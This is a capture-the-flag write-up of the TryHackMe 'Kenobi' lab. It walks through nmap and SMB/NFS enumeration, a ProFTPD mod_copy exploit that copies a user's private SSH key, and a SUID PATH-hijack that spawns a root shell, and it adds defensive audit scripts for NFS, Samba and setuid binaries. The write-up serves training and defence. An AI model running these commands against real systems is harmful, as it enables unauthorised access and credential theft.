# THM - Kenobi

March 6, 2022

## Kenobi

skibum, 8/29/2020
## Recon

### NMAP scans

Scan for open ports and understand what is available.

```
nmap -A -oN nmap/FullScan <Machine_IP>
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-29 06:56 CDT
Nmap scan report for <Machine_IP>
Host is up (0.20s latency).
Not shown: 990 closed ports
PORT     STATE    SERVICE     VERSION
21/tcp   open     ftp         ProFTPD 1.3.5
22/tcp   open     ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
80/tcp   open     http        Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp  open     rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      36173/udp   mountd
|   100005  1,2,3      38913/tcp6  mountd
|   100005  1,2,3      43825/udp6  mountd
|   100005  1,2,3      44273/tcp   mountd
|   100021  1,3,4      37709/tcp   nlockmgr
|   100021  1,3,4      44971/tcp6  nlockmgr
|   100021  1,3,4      46911/udp   nlockmgr
|   100021  1,3,4      49498/udp6  nlockmgr
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open     netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
1666/tcp filtered netview-aix-6
1801/tcp filtered msmq
2049/tcp filtered nfs
3703/tcp filtered adobeserver-3
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: kenobi
|   NetBIOS computer name: KENOBI\x00
|   Domain name: \x00
|   FQDN: kenobi
|_  System time: 2020-08-29T06:56:47-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-08-29T11:56:47
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.34 seconds
```
Knowing that SMB and RPC are available, let's script-scan SMB first.

```
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <Machine_IP> -oN nmap/smb445
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-29 07:44 CDT
Nmap scan report for <Machine_IP>
Host is up (0.21s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\<Machine_IP>\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\<Machine_IP>\anonymous: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\<Machine_IP>\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 43.14 seconds
```
Now let's script-scan RPC.

```
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount <Machine_IP> -oN nmap/rpc111
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-29 07:47 CDT
Nmap scan report for 10.10.1.115
Host is up (0.30s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount: 
|_  /var *

Nmap done: 1 IP address (1 host up) scanned in 2.33 seconds
```
## SMB client

```
smbclient //<Machine_IP>/Anonymous
Enter WORKGROUP\skibum's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Sep  4 05:49:09 2019
  ..                                  D        0  Wed Sep  4 05:56:07 2019
  log.txt                             N    12237  Wed Sep  4 05:49:09 2019

		9204224 blocks of size 1024. 6877100 blocks available
smb: \> get log.txt
getting file \log.txt of size 12237 as log.txt (12.2 KiloBytes/sec) (average 12.2 KiloBytes/sec)
smb: \> exit
```

```bash
cat log.txt
```
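The two scans above surface findings a defender should catch in configuration before they show up on the wire: an NFS export of /var to every host (`/var *`) and a Samba share with anonymous READ/WRITE. The shell audit below is an added example, not part of this writeup; the file paths, the sample exports file and the sample smb.conf are constructed for the demo.

```shell
#!/bin/sh
# Added example, not part of the writeup: audit /etc/exports and smb.conf for
# the exposures the scans found. Paths and sample configs are constructed.
# WARN for each exports entry whose client is '*' or which grants no_root_squash.
audit_exports() {
    file=$1
    while IFS= read -r line; do
        case "$line" in ''|'#'*) continue ;; esac
        set -- $line             # $1 = path, remaining words = client(options)
        path=$1; shift
        for client in "$@"; do
            if [ "${client%%(*}" = '*' ]; then
                echo "WARN $path exported to every host: $client"
            fi
            case "$client" in *no_root_squash*)
                echo "WARN $path allows remote root: $client" ;;
            esac
        done
    done < "$file"
}

smb_report() {            # emit a WARN for the share collected so far
    if [ -n "$section" ] && [ "$guest" = yes ]; then
        echo "WARN [$section] allows guest access (writable=$writable)"
    fi
}

# WARN for each smb.conf share with 'guest ok = yes' (synonym 'public = yes'),
# noting whether it is writable ('writable = yes' or 'read only = no').
audit_smb_conf() {
    section=''; guest=no; writable=no
    while IFS= read -r raw; do
        line=$(printf '%s' "$raw" | tr -d '[:blank:]' | tr 'A-Z' 'a-z')
        case "$line" in
            ''|'#'*|';'*) ;;
            '['*']') smb_report; section=${line#\[}; section=${section%\]}
                     guest=no; writable=no ;;
            guestok=*|public=*)     guest=${line#*=} ;;
            writable=*|writeable=*) writable=${line#*=} ;;
            readonly=no)            writable=yes ;;
        esac
    done < "$1"
    smb_report
}

# Constructed samples mirroring the findings above.
tmp=$(mktemp -d)
printf '/var *(rw,sync)\n/home *(rw,no_root_squash)\n/srv 10.0.0.0/24(ro)\n' > "$tmp/exports"
printf '[global]\n map to guest = Bad User\n[anonymous]\n path = /home/kenobi/share\n writable = yes\n guest ok = yes\n[print$]\n guest ok = no\n' > "$tmp/smb.conf"
audit_exports "$tmp/exports"; audit_smb_conf "$tmp/smb.conf"; rm -rf "$tmp"
```

Point the two functions at the real /etc/exports and /etc/samba/smb.conf to check a host; a share with `guest ok = yes` and `writable = yes` is exactly what the smb-enum-shares output above reported as anonymous READ/WRITE.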
## FTP

1. Connect to the FTP service and exploit ProFTPD 1.3.5: its SITE CPFR/CPTO copy commands (mod_copy) work without logging in, so copy kenobi's SSH key into /var/tmp.

```
nc <Machine_IP> 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) []
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
```

2. Mount the NFS export of /var (found with nfs-showmount above) and retrieve the copied key from its tmp directory.

```bash
mkdir /mnt/kenobiNFS
mount <Machine_IP>:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS
```

3. SSH into the machine with the key (copy /mnt/kenobiNFS/tmp/id_rsa to the working directory first).

```bash
ssh -i id_rsa kenobi@<Machine_IP>
```
## priv esc

1. Find SUID files

```bash
find / -perm /4000 -type f 2>/dev/null
```

Look for something that stands out.

- /sbin/mount.nfs
- /usr/lib/policykit-1/polkit-agent-helper-1
- /usr/lib/dbus-1.0/dbus-daemon-launch-helper
- /usr/lib/snapd/snap-confine
- /usr/lib/eject/dmcrypt-get-device
- /usr/lib/openssh/ssh-keysign
- /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
- /usr/bin/chfn
- /usr/bin/newgidmap
- /usr/bin/pkexec
- /usr/bin/passwd
- /usr/bin/newuidmap
- /usr/bin/gpasswd
- /usr/bin/menu
- /usr/bin/sudo
- /usr/bin/chsh
- /usr/bin/at
- /usr/bin/newgrp
- /bin/umount
- /bin/fusermount
- /bin/mount
- /bin/ping
- /bin/su
- /bin/ping6

Run the one that stands out, /usr/bin/menu, and check what it does.

```
/usr/bin/menu
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2020 17:51:48 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Wed, 04 Sep 2019 09:07:20 GMT
ETag: "c8-591b6884b6ed2"
Accept-Ranges: bytes
Content-Length: 200
Vary: Accept-Encoding
Content-Type: text/html
```

Note that the status check runs a curl command. Can we override PATH so the binary picks up our own curl instead of the system one?

Try to shadow the system curl with our own.

```bash
echo /bin/sh > /tmp/curl
chmod 777 /tmp/curl
export PATH=/tmp:$PATH
/usr/bin/menu
```

```
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
# whoami
root
# 
```
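The root shell above comes from a setuid binary that calls a helper by bare name and trusts whatever PATH it inherits. The shell audit below is an added example, not part of this writeup, that checks for that precondition from the defender's side: which setuid binaries embed bare tool names, and whether a bare name resolves through a world-writable directory. The fake `menu` binary, the tool list and the directory names are constructed assumptions.

```shell
#!/bin/sh
# Added example, not part of the writeup: audit the PATH-hijack precondition
# abused above from the defender's side. Binary and directory names are assumed.
export LC_ALL=C

# Print the printable strings (>= 4 chars) in a file that start with a common
# tool invoked by bare name instead of an absolute path (e.g. "curl -I ...").
bare_helper_calls() {
    tr -c '[:print:]' '\n' < "$1" | grep -E '^.{4,}$' \
        | grep -E '^(curl|wget|uname|ifconfig|ip|nc|netstat|ps|sh|bash|cat|ls|id|ping|python|perl)( |$)' \
        || true
}

# Show where a bare command name resolves under a given PATH and whether that
# directory is world-writable, i.e. whether an unprivileged user could shadow it.
resolve_in_path() {
    name=$1; oldifs=$IFS; IFS=:
    for dir in $2; do
        IFS=$oldifs
        [ -f "$dir/$name" ] && [ -x "$dir/$name" ] || continue
        if [ -n "$(find "$dir" -prune -perm -0002 2>/dev/null)" ]; then
            echo "HIJACKABLE $name -> $dir/$name (directory is world-writable)"
        else
            echo "ok $name -> $dir/$name"
        fi
        return 0
    done
    IFS=$oldifs
    echo "missing $name (not in PATH)"
}

# Run bare_helper_calls over every setuid binary on the host; output is
# "<binary>: <string>" for each suspicious string (not run in the demo below).
audit_suid_helpers() {
    find / -perm -4000 -type f 2>/dev/null | while IFS= read -r bin; do
        bare_helper_calls "$bin" | sed "s|^|$bin: |"
    done
}

# Constructed demo: a fake setuid helper whose strings embed bare tool calls,
# and a PATH whose first entry is a world-writable directory holding a "curl".
demo=$(mktemp -d); chmod 777 "$demo"
printf 'ELF\000menu\000curl -I localhost\000uname -r\000/usr/bin/ifconfig\000' > "$demo/menu"
: > "$demo/curl"; chmod 755 "$demo/curl"
bare_helper_calls "$demo/menu"
resolve_in_path curl "$demo:/usr/bin:/bin"
rm -rf "$demo"
```

The remediation for a binary like menu is to call helpers by absolute path and to set PATH to a fixed value before executing anything; audit_suid_helpers lists the setuid binaries on a host that embed bare tool names so they can be reviewed for exactly that.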